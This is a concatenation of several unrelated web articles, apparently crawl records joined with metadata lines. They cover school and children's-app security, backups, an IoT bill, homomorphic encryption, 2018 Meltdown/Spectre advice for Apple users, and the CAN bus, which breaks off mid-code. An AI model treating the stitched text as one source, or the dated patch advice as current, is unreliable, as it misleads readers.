It only takes one person to allow a hacker to infiltrate a school system. Digital security training is a must to ensure that students and faculty can recognize and take the appropriate action for suspicious activities like phishing emails. For example, a common cyber threat is when hackers pose as school officials asking for important information such as tax information or identification information.
Since many of the learning technologies on the market are new to students and staff, it’s especially critical to understand the implications of a security breach and the necessary steps to mitigate risks.
2. User Access Control
The principle of "least privilege" can also help avoid a cyber attack. This principle allows users access to data and systems only on a need-to-know basis, and can mitigate data breaches that occur via unauthorized or unnecessary access. Hackers often try to infiltrate lower-level devices and accounts as a way to gain access to higher-value accounts and systems. Schools can take action by maintaining an inventory of what each user has access to, which functions they can perform, and why. Ensuring that users have access to only what they need confines an attack to a smaller area of the system and helps protect the security ecosystem as a whole.
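In code, least privilege often reduces to a deny-by-default permission check. The roles and actions below are hypothetical, but the pattern — an explicit allow-list per role, with everything else refused — is the general one:

```python
# Hypothetical role-to-permission map implementing "least privilege":
# each role gets only what it needs, and everything else is denied by default.
PERMISSIONS = {
    "student":   {"read_own_grades", "submit_assignment"},
    "teacher":   {"read_class_grades", "post_assignment", "submit_grade"},
    "registrar": {"read_all_grades", "edit_enrollment"},
}

def is_allowed(role: str, action: str) -> bool:
    """Deny-by-default check: unknown roles and unlisted actions get nothing."""
    return action in PERMISSIONS.get(role, set())

print(is_allowed("student", "read_own_grades"))  # True
print(is_allowed("student", "read_all_grades"))  # False: denied by default
```

Because a compromised student account can only do what the "student" allow-list grants, an attacker who lands there cannot pivot directly into registrar-level data.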
3. Update Security and Password Management Policies
An often overlooked but critical cybersecurity protocol is having a robust password management policy. These policies must also be in accordance with provincial and territorial legislation, which set guidelines and rules that govern how students and faculty use their devices and online learning technologies. Password management policies that encourage strong passwords and multi-factor authentication are essential to prevent password sharing and unrestricted access.
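A minimal, illustrative policy check is sketched below. The 12-character minimum and the required character classes are assumptions for the example — actual thresholds should follow the institution's own policy and applicable guidance:

```python
import string

def meets_policy(password: str, min_length: int = 12) -> bool:
    """A minimal policy check: length plus mixed character classes."""
    classes = [
        any(c.islower() for c in password),
        any(c.isupper() for c in password),
        any(c.isdigit() for c in password),
        any(c in string.punctuation for c in password),
    ]
    return len(password) >= min_length and all(classes)

print(meets_policy("correct-Horse7battery"))  # True
print(meets_policy("password123"))            # False: too short, missing classes
```

A check like this would typically run at enrollment and password-change time, alongside multi-factor authentication rather than instead of it.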
4. Third-Party Vendor Management
Third-party technology vendors have become an integral component of distance learning, but they are also a vulnerability. Educational institutions need to ensure that they are properly managing their technology vendors so their students’ safety is prioritized above all else. Undergoing a thorough vetting process to evaluate third-party technology, as well as vendors’ terms and conditions, will help identify any security gaps that can create greater issues down the road.
Make Distance Learning Safe Learning
The ascendance of distance learning during the pandemic has given educators, students, and parents new insights into both the opportunities and challenges of not being in a physical classroom. One of the most critical is the importance of creating safe and secure virtual environments to ensure that students are safe. Despite the benefits that education technology provides, without proper training or technical safeguards in place, schools and students are left vulnerable to the dangers of external threats. By enhancing awareness of cyber threats and implementing a strong security strategy, educators and parents can start creating safer learning environments for students to thrive.
To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, subscribe to our email, listen to our podcast Hackable?, and ‘Like’ us on Facebook.
Designing an award-winning application for children doesn’t just mean engaging graphics and interactive audiovisuals; in-built cyber security controls and data protection are critical.
When the COVID-19 global pandemic broke out, the whole world had to turn to digital modes to continue working, networking and socializing, especially when the lockdowns were imposed. Schools also began conducting online classes, and children’s screen time witnessed a dramatic increase. This was over and above the time that children already spend online on various platforms and websites for gaming, entertainment and social media.
It has been estimated that children aged between 8 and 18 years spend upwards of seven hours online. This makes them prone to cyberbullying, and they can also become easy targets for cyber predators. They are also unaware of phishing and cyber security best practices, so they are susceptible to sharing private information that could fall into the hands of nefarious actors.
Given the risks involved, there are several inherent challenges in designing apps for children that app developers must overcome to ensure that the data is secure and private, without compromising on the user experience.
Challenges in creating secure applications for children
Organizations and app development teams must understand the various risks involved before releasing any public-facing app for children. Designing an award-winning app for children does not only mean using engaging and interactive audio and visuals; the protection of all data related to its users is also vital. Some of the challenges of creating secure apps, especially for children, are:
· Secure and intuitive user interface and experience
The process of developing apps is usually complex; it gets more complicated when the target market is children below the age of 16 years. From the application standpoint, ensuring the user interface and user experience are simple, secure and intuitive is the predominant challenge. The app development team and the organization have to recognize children as spontaneous and intelligent, with an exceptional ability to learn new things.
· Uncompromising adherence to compliances
The other major challenge is adhering to the necessary compliances and policies with regard to children’s data. Though there seem to be no specific guidelines pertaining to the protection of children’s data in India, many app developers and organizations fall back on the European Union’s General Data Protection Regulation (GDPR).
The EU’s GDPR clearly states that organizations and app developers must obtain the consent of parents or guardians before processing children’s data. This is to ensure that no one can manipulate the data and that no one with malicious intent can access it.
Best practices for app developers when creating applications for children:
· Plan for cybersecurity right from the start
Most app developers and organizations rush to release the app and as a result focus on creating the best user experience and functionality. Little thought is given to data privacy and security; with no mandatory regulations like the EU’s GDPR currently in place, corrective action is taken only after data has been exploited.
Once stringent laws and regulations are in place, data privacy and security will become mandatory. Organizations and app developers will have to take into account data privacy and security from the beginning. It is best if this is part of the planning for development, and included in the product roadmap and budget. It is also important to ensure an audit or review by a third party.
· In-built security controls
Unless there is a paid subscription, a majority of gaming and entertainment applications include in-app purchases or payment transactions. However, there is very little monitoring of who is performing these transactions, and whether the purchaser is actually a child or an adult. Such situations can pose serious cyber security threats, especially in the case of public-facing children’s applications.
To overcome such risky situations, app developers can build in security controls such as multi-factor authentication, mandatory manual intervention before each transaction, and filtering mechanisms based on the age of the user.
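Combined, those controls amount to a simple guard in front of every transaction. The sketch below is hypothetical; the adult-age threshold and the shape of the second-factor check are illustrative assumptions:

```python
# Hypothetical in-app purchase guard for a children's app: purchases are
# refused outright for under-age profiles, and even adult profiles need
# an explicit second factor (e.g. a parent-approval prompt or MFA code).
ADULT_AGE = 18

def approve_purchase(profile_age: int, second_factor_ok: bool) -> bool:
    if profile_age < ADULT_AGE:
        return False          # age-based filter: child profiles cannot buy
    return second_factor_ok   # mandatory manual step before the transaction

print(approve_purchase(9, True))     # False
print(approve_purchase(35, False))   # False: no confirmation given
print(approve_purchase(35, True))    # True
```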
· Using AI, ML, and NLP effectively
Given the potential cyber security threats and risks, app developers and organizations must go beyond current practices: exploit Artificial Intelligence (AI) and Machine Learning (ML), use Natural Language Processing (NLP) for word predictions, develop algorithms for pattern detection, and alert guardians or parents in case of any deviation. For organizations and app developers, AI and ML can also be used to detect anomalies, provide insights, give feedback to the backend teams, and report incidents to law enforcement if required. With these security controls built in, organizations and app developers can deliver far safer apps for children.
· Use compliances to stay on the safe side
Given that data protection laws in India are yet to be enforced, organizations could well model their protections on the industry standards used in other countries. In the absence of laws and guidelines, organizations could follow those enshrined under the EU’s GDPR, Data Protection Act, etc. to either have in-built security controls or define their own best practices.
· Refer to OWASP Top 10
Some security best practices come from standards such as the Open Web Application Security Project’s OWASP Top 10 and the guidance of the National Institute of Standards and Technology (NIST). The OWASP Top 10 was updated in 2021, and design-level security best practices have now been defined. If the security controls specified under these guidelines and standards are put in place, the public-facing app will be truly secure, irrespective of its target audience.
· Create awareness among parents and guardians
It’s recommended that parents and guardians actively inform and educate themselves on the online habits and explorations of their children. Caregivers also have the responsibility of raising awareness among children about the risks involved in sharing sensitive data along with how best to protect themselves when using public-facing apps.
Rely on an expert like Entersoft
Entersoft, a leading application security provider, is helping businesses across the fintech and blockchain technology sectors secure their apps through future-ready solutions. Entersoft can help app developers and organizations better understand their risks and threat factors while defining means of safeguarding their applications.
The best way to build secure apps is to start from the design stage itself, as a simple penetration test on an app is not enough to understand all inherent risks. This is where Entersoft’s services come into play.
The first step is to understand the business purpose, usage of the app, why the specific age group is being on-boarded, and the region-specific laws and compliances that need to be adhered to. | <urn:uuid:e0157c99-c0a7-484b-8e34-18864697ce80> | CC-MAIN-2022-40 | https://blog.entersoftsecurity.com/applications-for-children/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00088.warc.gz | en | 0.938253 | 1,533 | 2.875 | 3 |
The Oxford English Dictionary defines backup as “The procedure for making extra copies of data in case the original is lost or damaged” and “An extra copy of data from a computer”. The word backup in this meaning was first used in 1951, the year the UNIVAC (Universal Automatic Computer), the first commercially produced computer in the United States, was delivered. The UNIVAC had its own internal storage, but required data and programs to be loaded into it via punch cards. These punch cards can be considered the first data storage devices for backups. Anytime a program or dataset needed to be loaded, it would be read from the punch cards, similar to how a restore functions.
Over time, as computer storage devices have changed, so too have the backup devices. After those first punch cards came magnetic tapes, then hard drives, floppy disks, optical disks, and flash drives. With the advent of local area networks in the late 1970s, backups no longer had to be performed to a storage target directly connected to the computer; they could be written over the network to a backup medium somewhere else. With the emergence of the public Internet in the 1990s, online backup services flourished. Today, the cloud is a popular backup target.
Shortly after computers were invented, someone decided that they needed to be backed up. Traditionally, this involved an agent installed on the client. That agent then used the system's resources to look at all the files on the system and move them to the backup environment. This could consume a lot of resources, so backups needed to be performed at night, when the systems were idle, to prevent production outages. The backup data would travel over the network, and large systems would take hours (or days) to finish a single backup. How many Backup Administrators have fielded a call from their Network Administrators demanding that backups be stopped to free up network bandwidth for other tasks?
For the most part, backups have gone relatively unchanged for 60+ years. A computer system uses an agent to copy files from its primary storage location to a backup storage location. Be it punch cards or magnetic tape, flash drives or over the network, an agent was used to copy that data, using the resources of the host system.
How Virtualization Changes Backups
A virtual machine looks and acts very much like a regular, physical computer system. Many times, users will never know that the system they are using is a virtual machine, and the same holds true for applications. A virtual machine can still be backed up using a traditional backup agent, but there are a few drawbacks to this method. First off, if multiple agent backups run at the same time on the same physical host, each virtual machine backup will be rate limited by the bandwidth of that host. This is where some of the underlying technology of virtual machines benefits modern backup procedures.
Each virtual machine is made up of one or more virtual machine disk files. These disk files reside on some kind of storage: SAN-attached storage, network-attached storage (NAS), or direct-attached storage (DAS). When using SAN-attached storage, the same storage can be presented to the backup host. In these cases, the backups can be made to run off the SAN, eliminating performance issues and resource bottlenecks on the virtual machines and their hosts. This results in true off-host backups with a boost to the speed of each backup.
Another benefit that virtualization brings is change block tracking. This allows the physical host to monitor and record blocks that change within each virtual machine. Rather than looking through an entire directory tree to find files that have changed, the changed blocks are known, and those are the only ones that need to be backed up. By backing up only these changed blocks, the time a backup takes to run is dramatically reduced.
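The mechanism can be sketched with a toy model (no real hypervisor API is used here): the host keeps a set of block indices written since the last backup, and the incremental backup copies only those.

```python
# Toy model of change block tracking (CBT). The "hypervisor" records
# which block indices were written since the last backup, so an
# incremental backup copies only those blocks instead of scanning the
# entire virtual disk.
class VirtualDisk:
    def __init__(self, num_blocks: int):
        self.blocks = [b"\x00"] * num_blocks
        self.changed = set()              # the CBT map

    def write(self, index: int, data: bytes):
        self.blocks[index] = data
        self.changed.add(index)           # tracked at write time, no scan

    def incremental_backup(self) -> dict:
        """Copy only the changed blocks, then reset the tracking map."""
        snapshot = {i: self.blocks[i] for i in sorted(self.changed)}
        self.changed.clear()
        return snapshot

disk = VirtualDisk(1000)
disk.write(3, b"boot")
disk.write(42, b"data")
backup = disk.incremental_backup()
print(sorted(backup))   # [3, 42] -- two blocks copied instead of 1000
```

The backup window shrinks because the cost is proportional to the number of changed blocks, not to the size of the disk.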
With the proper backup software, the right hardware configuration, and up to date virtualization platforms, backups of hundreds of virtual machines can be accomplished in a matter of minutes. What used to take hours during the night, can now be accomplished in minutes, anytime during the day. Can you say your virtual machines are protected like that? | <urn:uuid:d35b8353-c940-44c7-a1d8-226cd6052f29> | CC-MAIN-2022-40 | https://www.ensono.com/resources/blog/what-backup/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00088.warc.gz | en | 0.951396 | 838 | 3.984375 | 4 |
“Sometimes the wheel turns slowly, but it turns.”
That quote, made famous by Lorne Michaels, certainly applies in the case of the government’s involvement in securing internet-connected devices.
By now, almost everyone has at least one “smart” device in their home or driveway. Projections are that there will be more internet-connected devices than computers and mobile phones by the year 2020, and the rate of growth is still increasing.
As exciting as that sounds, there’s a dark side to those statistics. Most manufacturers are notoriously bad when it comes to securing these devices. In fact, most internet-connected devices don’t have even basic security protections in place, which has led to hackers creating vast armies of enslaved devices to serve in their botnets, which they use to conduct denial-of-service attacks.
In recent months, we’ve seen hackers take control of everything from smart guns to smart cars and even internet-connected medical devices. The key difference here is that while hacking your PC might cost you money, the examples above put human lives in danger, and finally, the government is getting involved.
There’s a new bill making its way through the halls of Congress called The Internet of Things Cybersecurity Improvement Act of 2017. While the name is a bit of a mouthful, its purpose is strikingly simple and clear. The bill proposes a minimum set of security standards that must be in place in order for the government to purchase smart devices.
Given the sheer amount of product the government purchases each year, for the first time, manufacturers have a clear and compelling reason to begin implementing device security, which they have been steadfastly ignoring to this point.
Currently, the fate of the bill is unknown, but it certainly seems like something that both major political parties can get behind. If it passes, it will be good news indeed for everyone who owns a smart device, which again, at this point, is almost everyone. Progress may have been slow in this case, and long overdue, but at last, the wheel is turning. | <urn:uuid:b05ae41a-dc0b-4f8b-a1b4-a20dcc15e053> | CC-MAIN-2022-40 | https://dartmsp.com/new-bill-may-help-secure-internet-connected-devices/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00088.warc.gz | en | 0.967477 | 427 | 2.6875 | 3 |
2021-01-19

IBM recently announced big developments in homomorphic encryption. This could bring trustworthy confidential computing into the mainstream.
What is Confidential Computing?
Many organizations say that they can't use the cloud. They can't put their data in someone else's data center.
Now, if you only use cloud storage, then all is fine. Encrypt the data on premises. Store nothing but ciphertext in the cloud.
But what if you want to process your data? That is, literally do cloud computing? It seems that you need to decrypt your data in the cloud. Next, do the calculations. Finally, encrypt the result.
Or at least that is the traditional way.
Confidential computing means doing calculations while maintaining the data's confidentiality. New CPU architectures have provided some methods. However...
Hardware Solutions Have Had Problems
The past few years brought many unpleasant surprises about hardware security problems. A big one is related to Intel's Software Guard Extensions or SGX.
Intel built some security-related machine instructions into some recent CPUs. Both user programs and the OS kernel can use them to define enclaves, private regions of memory. Even the OS kernel cannot read or write a user-defined enclave.
The plan would be to read encrypted data from the disk, storing it in the enclave. Then, decrypt it within the protected enclave. Next, do the calculations on the sensitive data. Finally, re-encrypt it and transfer it back to the disk.
At least that was the plan. Researchers have found several ways to expose enclave data. Many are variations on speculative execution attacks. Others are side-channel attacks.
Another possible hardware solution is AMD's EPYC Secure Encrypted Virtualization, or SEV. This supports Google's Confidential VMs, virtual machines doing confidential computing in the Google Cloud.
I have created a list of hardware vulnerabilities. It's my attempt to keep track of developments. It's hard to keep up!
Hardware solutions for confidential computing have a poor track record. Pure cryptography seems more promising.
How Fast is Cryptography Developing at the Moment?
In October 2019, a team led by Google announced a major step forward in quantum computing. The team's quantum processor finished a task in 200 seconds. They estimated that the DOE's state-of-the-art supercomputer would take 10,000 years to finish the same task.
Meanwhile, NIST has a Post-Quantum Cryptography program well underway. In July 2020, they announced the Round 3 candidates for the coming standard.
Around that time, IBM announced practical tests of fully homomorphic encryption on MacOS and iOS and then on Linux.
This may be like the late 1970s. Public-key cryptography, Diffie-Hellman key agreement, RSA encryption, and DES all appeared during the period 1975-1977. That was before my time, but it's a famous three years.
How to Implement a Homomorphic Encryption Scheme?
Early work on fully homomorphic encryption placed extreme limits on the computation. You could calculate on ciphertext input, as long as your problem was limited to addition. Or a modulo operation. Or an Exclusive-OR operation. It was possible, but not useful.
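That additive property is easy to demonstrate with a toy implementation of the Paillier cryptosystem, one of those early additively homomorphic schemes. The primes below are tiny and the randomness is fixed, so this is purely illustrative and in no way secure (and it is not IBM's toolkit):

```python
import math

# Toy Paillier cryptosystem: multiplying two ciphertexts produces a
# ciphertext of the SUM of the plaintexts, i.e. addition on encrypted
# data. Tiny fixed primes for illustration only.
p, q = 61, 53
n = p * q                      # public modulus
n2 = n * n
g = n + 1                      # standard choice of generator
lam = math.lcm(p - 1, q - 1)   # private key
mu = pow(lam, -1, n)           # with g = n + 1, L(g^lam mod n^2) = lam

def encrypt(m: int, r: int) -> int:
    # r must satisfy 1 <= r < n and gcd(r, n) == 1
    return (pow(g, m, n2) * pow(r, n, n2)) % n2

def decrypt(c: int) -> int:
    l = (pow(c, lam, n2) - 1) // n     # the function L(x) = (x - 1) / n
    return (l * mu) % n

c1 = encrypt(12, r=17)
c2 = encrypt(30, r=23)
c_sum = (c1 * c2) % n2   # homomorphic addition: no decryption involved
print(decrypt(c_sum))    # 42 == 12 + 30, computed entirely on ciphertexts
```

Fully homomorphic schemes extend this idea so that both addition and multiplication, and therefore arbitrary circuits, can be evaluated on ciphertexts.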
Open source homomorphic encryption is now practical in the real world. See the above links to IBM's announcements for toolkits on Linux, MacOS, and iOS.
How Difficult is Homomorphic Encryption?
The software is available to be downloaded and used. It's easy for developers.
However, its computational complexity remains an issue. It's hard for computers. It's not as terribly slow as initial solutions were. But homomorphic encryption still makes even simple calculations significantly slower.
The good news is that its performance is acceptable for some popular uses.
For example, machine learning on big data sets containing sensitive information. That problem tolerates approximate answers, meaning that a speed/accuracy trade-off makes the technology practical.
There's still a long way to go in the way of performance for many compute jobs, but the recent developments are a large advance.
What to Know, and Where to go Next?
The CISSP and CCSP exams now include questions about homomorphic encryption. However, it's just "big picture" recognition of the topic. If you know "Homomorphic encryption means calculations on encrypted input yielding encrypted output", that should be plenty. Learning Tree's courses for CISSP test-prep and CCSP test-prep cover all you need to know for those exams.
To check recent developments, and see who is doing what, see the HomomorphicEncryption.org web site. It's run by an open consortium of industry, academia, and government.
If you want to go further, there's a nice survey paper covering the topic, explaining the terminology and concepts.
You've probably heard something about "Meltdown" and "Spectre," perhaps even in the mainstream media, and you likely heard that it has something to do with an Intel security flaw.
But do you know how it affects your Apple devices—your Mac, iPhone, iPad, iPod touch, Apple Watch, or Apple TV—and what actions you may need to take to stay safe?
Never fear, that's why we're here! It's a complex problem, but we'll break it down and share the main tidbits about these vulnerabilities you need to know as a user of Apple products.
What are Meltdown and Spectre?
On Monday, January 1, 2018, a developer blog, called "python sweetness," brought to light an issue in which "there is presently an embargoed security bug impacting apparently all contemporary CPU [central processing unit] architectures that implement virtual memory, requiring hardware changes to fully resolve."
The Register published an article the following day that emphasized the design flaw with regard to Intel processors, and from there snowballed into a worldwide discussion about a serious flaw in Intel CPUs that had major security implications.
Macs, along with the vast majority of the world's Windows and Linux PCs, use Intel processors.
As more information came to light in the subsequent days, it became clear that more than just Intel CPUs are affected; there are also implications for other processor architectures, including AMD processors as well as ARM-based processors like those found in Apple's iPhones and iPads.
It turns out that Intel and a handful of software development giants, among them Apple, Microsoft, and the Linux kernel developers, have known about the design flaw since at least November 2017 and have been working behind the scenes to prepare for a coordinated public disclosure and remediation of the issue. (At least, that was the plan until "python sweetness" and The Register brought the issue out of obscurity and into the public spotlight.)
"Meltdown" and "Spectre" are nicknames for techniques that can enable an attacker to access computer memory that shouldn't be accessible; this is accomplished by abusing a technology called "speculative execution."
Speculative execution is a processing feature that enables computing devices to run faster by predicting what will happen next in an app, and preemptively working toward multiple possible outcomes all at once.
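A toy software simulation can illustrate why that is dangerous. Real Meltdown and Spectre attacks exploit CPU hardware and cache timing, not Python; the model below only mimics the shape of the problem: the "CPU" runs past a bounds check, the out-of-bounds result is discarded, but the simulated cache keeps a footprint the attacker can read afterwards.

```python
# Toy simulation of a speculative-execution leak. The transient read is
# architecturally squashed, but its side effect on the "cache" survives.
memory = list(b"public data") + list(b"S")   # the byte past BOUND is secret
BOUND = len(b"public data")                  # the bounds-check limit
cache = set()                                # which values are "hot"

def speculative_read(index: int):
    # The branch predictor guesses "index < BOUND" and runs ahead anyway.
    value = memory[index]     # transient access, possibly out of bounds
    cache.add(value)          # side effect: a cache line gets touched
    if index >= BOUND:
        return None           # mis-speculation detected: result squashed...
    return value              # ...but the cache update already happened

speculative_read(BOUND)       # architecturally, nothing is returned

leaked = next(iter(cache))    # the attacker probes the cache afterwards
print(chr(leaked))            # 'S': the secret byte escaped anyway
```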
The end result of leveraging Meltdown and Spectre could include leaks of sensitive data such as passwords and credit card information, among other things.
What do all these names mean?
A vulnerability may be known by many names.
Perhaps the broadest term for the vulnerabilities in question would be "speculative execution vulnerabilities."
"Meltdown" and "Spectre" are the main names that have caught on in association with this bug; each of these are unique and will be described further in their own sections below.
When the story broke, it was at first being discussed online under the name KPTI in reference to Kernel Page-table Isolation (formerly called KAISER), a feature of the Linux kernel that mitigates the Meltdown vulnerability.
There's also a not-safe-for-work nickname that was reportedly conceived by the Linux kernel team: F***WIT (which stands for "Forcefully Unmap Complete Kernel With Interrupt Trampolines").
You may also see references to "CVE" numbers associated with these bugs. CVE stands for Common Vulnerabilities and Exposures, and CVE numbers are used for the purpose of tracking the same bug across multiple vendors and media outlets, as bugs tend to be described in many different ways and may have various nicknames.
What is Meltdown?
Meltdown is the nickname for one of two major categories of exploits at this time. It may also be referred to as the "rogue data cache load" technique, or CVE-2017-5754.
Successful exploitation could allow an attacker's code running in a user-privileged app to read kernel (superuser-privileged) memory.
Apple said that its own analysis suggested that the Meltdown exploitation technique "has the most potential to be exploited" as compared with the Spectre exploitation techniques.
What is Spectre?
The other exploitation techniques are known collectively as Spectre (sometimes spelled Specter). The two techniques may be referred to as "bounds check bypass" or CVE-2017-5753, and "branch target injection" or CVE-2017-5715.
From Apple's public statement:
In other words, Web pages in an unpatched browser can potentially exploit Spectre.
Is my Apple device safe from Meltdown?
If your Apple device is running one of the following operating systems, you're already (at least partially) protected against Meltdown attacks:
- macOS 10.13.2 or later
- iOS 11.2 or later
- tvOS 11.2 or later
It's important to note that Apple often releases security-only updates for the two previous versions of macOS, in this case Sierra and El Capitan. However, Apple has not given any indication that updates for Sierra or El Capitan are forthcoming.
Thus, if you have an older version of macOS (or OS X), you'll need to upgrade to macOS High Sierra version 10.13.2 or later to protect against Meltdown attacks. (You may need to first find out whether your Mac can be upgraded.)
Apple has indicated that macOS High Sierra version 10.13.3 is in the works and will include further protections against Meltdown attacks, so be sure to install it when it becomes available.
According to Apple, "Apple Watch is not affected by either Meltdown or Spectre."
Apple specifically claims "watchOS did not require mitigation" for Meltdown, while "watchOS is unaffected by Spectre."
The company has not offered further explanation as to why watchOS, which shares much of its codebase with iOS, allegedly does not require mitigations.
Is my Apple device safe from Spectre?
In short: no, not yet (except for Apple Watch, which Apple says is unaffected).
Apple is planning to release a Safari update for both macOS and iOS "in the coming days," so stay tuned for that. Once the updates are available, you'll find the Mac update in the Mac App Store app under Updates, and you'll find the iOS update in the Settings app under General > Software Update.
If you use a third-party browser such as Firefox or Chrome, you'll want to install any new updates that get released this month.
Firefox 57.0.4 is already out and includes mitigations for Spectre. You can check for updates by going to the Firefox menu and selecting About Firefox, or you can download a fresh copy of the app.
Meanwhile, Google isn't planning to update Chrome until around January 23, according to Fortune. However, Chrome users who wish to be protected can follow a manual process to enable a Spectre mitigation (note, however, that doing so will increase Chrome's memory consumption by about 10–20%).
Until Apple and Google release patches, it's probably safest to use Firefox 57.0.4 or later on your Mac, and avoid using Safari or Chrome for now.
As for iOS devices (iPhone, iPad, and iPod touch), there doesn't seem to be a safe alternative browser, so you'll just have to wait patiently for Apple's forthcoming update. If you're concerned, you may wish to avoid logging into sites or entering any passwords or sensitive information in Safari or other mobile browsers for iOS, and instead opt to use your Mac for Web browsing until Apple updates iOS.
Will Apple update Macs' EFI firmware?
It remains to be seen whether Apple will release EFI firmware updates for Macs to more fully address the issue closer to the hardware level.
Noting that Apple did not say anything about EFI in its public statement, we reached out to Apple to inquire about whether EFI updates are forthcoming. Apple's Todd Wilder responded with the following statement:
"We no longer distinguish between EFI updates and OS updates for the Mac. We will be applying mitigations wherever in the stack it is necessary, and customers will receive those updates in the form of macOS updates."
In other words, if Apple does decide that it's necessary to release EFI firmware updates for any Macs, those updates would be bundled with a future version of macOS High Sierra or later, rather than published as a distinct and separate update.
Will my device be slower after I update?
Early reports suggested that by disabling speculative execution functionality, certain system functions may be anywhere from 5 to 30 percent slower.
Apple claims that its Meltdown and Spectre mitigations do not cause such serious performance degradation.
According to Apple, the Meltdown mitigations already in place in macOS 10.13.2, iOS 11.2, and tvOS 11.2 "resulted in no measurable reduction in … performance."
However, Apple indicates that its upcoming mitigations for Spectre in Safari may have a performance impact of less than 2.5% in one particular benchmark, while other benchmarks see no measurable reduction in performance.
In short, your Apple device probably won't feel slower as a result of Apple's Meltdown and Spectre mitigations. (Your iOS device might, however, feel slower for other reasons.)
Is there anything else I should know?
Absolutely. First of all, this is a developing story, so expect further plot twists. It's very likely that we still don't know all of the ramifications of the flaws in speculative execution processor technology.
There's a special episode of the Intego Mac Podcast coming next Wednesday, January 10, in which Kirk McElhearn and I further discuss the topic and explain what speculative execution means. Be sure to subscribe now in iTunes/Podcasts or in your favorite podcatcher to make sure you get the Meltdown/Spectre episode when it becomes available.
If you own or support any Windows systems (including if you run Windows on your Mac, either via Boot Camp or via virtual machine software such as VMware Fusion, Parallels Desktop, or Oracle VirtualBox), be sure to install the latest Windows updates from Microsoft.
Note that systems running Windows 7 (or Server 2008 R2) or Windows 8.1 (or Server 2012 R2) may need to manually download and apply the patch, since it may not appear in Windows Update; meanwhile, Windows 10 (and Server 2016) users should get the update as part of the usual patch cycle. Make sure your Windows anti-virus is fully up to date before you install the Windows patches.
Windows PCs may also need BIOS/UEFI firmware updates in order to be better protected. Not all PC manufacturers have given information about which PC models will be receiving updates, and some older PCs simply won't be getting BIOS updates. If you're running Windows via a virtual machine on your Mac, check with your VM vendor to see whether a new version may be needed (VMware has released a public statement, but Parallels and Oracle have not yet).
If you'd like to learn more about the speculative execution vulnerabilities, the following resources may be useful:
- Apple has issued a statement titled "About speculative execution vulnerabilities in ARM-based and Intel CPUs"
- https://meltdownattack.com is the "official" Meltdown and Spectre information site
- Bleeping Computer and Forbes have both attempted comprehensive lists of vendor updates, although neither list is complete (neither links to BIOS updates, for example)
Image credit: xkcd #1938 by Randall Munroe
The world's public knowledge about speculative execution vulnerabilities is only just beginning to blossom. As more brilliant minds begin exploring potential avenues for exploitation, it's likely that more patches will be needed, so subscribe to The Mac Security Blog, the Intego Mac Podcast, and Intego's YouTube channel to make sure you don't miss any important news! | <urn:uuid:93f42196-03af-4c1d-a1bb-9dfe8733663a> | CC-MAIN-2022-40 | https://support.intego.com/hc/es/articles/115003855272-Meltdown-y-Spectre-lo-que-los-usuarios-de-Apple-necesitan-saber | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00088.warc.gz | en | 0.9422 | 2,534 | 2.6875 | 3 |
What is CAN bus?
Controller Area Network (CAN) bus is a standard in the automotive industry that was designed to make communication between microcontrollers possible without a host computer, and it serves as the communication backbone for control systems in modern vehicles and industrial automation. It also allows a range of on-board diagnostics to be monitored (via the OBD-II port), including reporting on events such as engine failure or airbag deployment.
The CAN bus protocol was developed by Robert Bosch GmbH beginning in 1983 and officially released at the Society of Automotive Engineers (SAE) congress in 1986, with the first CAN controller chips produced by Intel in 1987.
There are several versions of the CAN specification, the classical one being CAN 2.0, which has two parts: part A is the standard format with an 11-bit identifier (CAN 2.0A), and part B is the extended format with a 29-bit identifier (CAN 2.0B). The CAN standard ISO 11898, first published in 1993, was later reorganised into ISO 11898-1 (covering the data link layer) and ISO 11898-2, which deals with the CAN physical layer for high-speed CAN.
Low-speed CAN (fault-tolerant) is covered by ISO 11898-3.
The CAN standards continue to be developed, with CAN FD 1.0 (CAN with Flexible Data-Rate) released in 2012. Its modified frame format allows a larger data length code (payloads of up to 64 bytes instead of 8) and switching to a faster bit rate (measured in Mbit/s or kbit/s) after arbitration is decided.
The CAN bus system is used in on-board diagnostics (OBD) for sending CAN data to an external system such as a telematics solution.
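As a concrete illustration of the kind of data carried over the OBD-II port, the standard engine-RPM parameter (mode 01, PID 0x0C) packs its value into two bytes with the scaling RPM = (256 × A + B) / 4. A minimal decoder might look like the following sketch; the frame bytes in the example are made-up sample values:

```python
def decode_engine_rpm(payload: bytes) -> float:
    """Decode engine RPM from an OBD-II mode-01, PID-0x0C response.

    payload holds the response data bytes: 0x41 (mode-01 response),
    0x0C (the PID), then the two value bytes A and B.
    The standard scaling is RPM = (256 * A + B) / 4.
    """
    if payload[0] != 0x41 or payload[1] != 0x0C:
        raise ValueError("not a mode-01 PID-0x0C response")
    a, b = payload[2], payload[3]
    return (256 * a + b) / 4

# Sample frame: A = 0x1A (26), B = 0xF8 (248) -> (256*26 + 248) / 4
print(decode_engine_rpm(bytes([0x41, 0x0C, 0x1A, 0xF8])))  # → 1726.0
```

In a real telematics application these bytes would arrive in the data field of a CAN frame read from the bus.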
Modern vehicles can have around 70 Electronic Control Units (ECUs) to control different functionality within the car or truck, using the CAN bus network for data transmission and coordinating different systems. ECUs, also known as CAN nodes, can communicate externally with the use of ethernet or USB connectors.
All ECU modules (or CAN nodes) are connected via a two-wire twisted-pair bus, terminated at each end with a 120-ohm resistor, and communicate using logic bits: each bit is either dominant (logical 0, higher priority) or recessive (logical 1, lower priority).
Bus access is regulated by bitwise arbitration, and all CAN nodes are synchronised so that they sample the same bit at the same time.
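To sketch how that arbitration works: each node transmits its frame identifier bit by bit, most significant bit first; the bus behaves like a wired-AND, so a dominant 0 overrides a recessive 1, and a node that sends recessive but reads dominant drops out. The net effect is that the frame with the numerically lowest identifier wins. A simplified simulation (the competing IDs are illustrative):

```python
def arbitrate(ids, id_bits=11):
    """Simulate CAN bitwise arbitration among competing 11-bit frame IDs.

    The bus acts as a wired-AND: a 0 (dominant) overrides a 1
    (recessive). A node that transmits recessive but observes dominant
    loses arbitration and stops transmitting for this frame.
    """
    contenders = set(ids)
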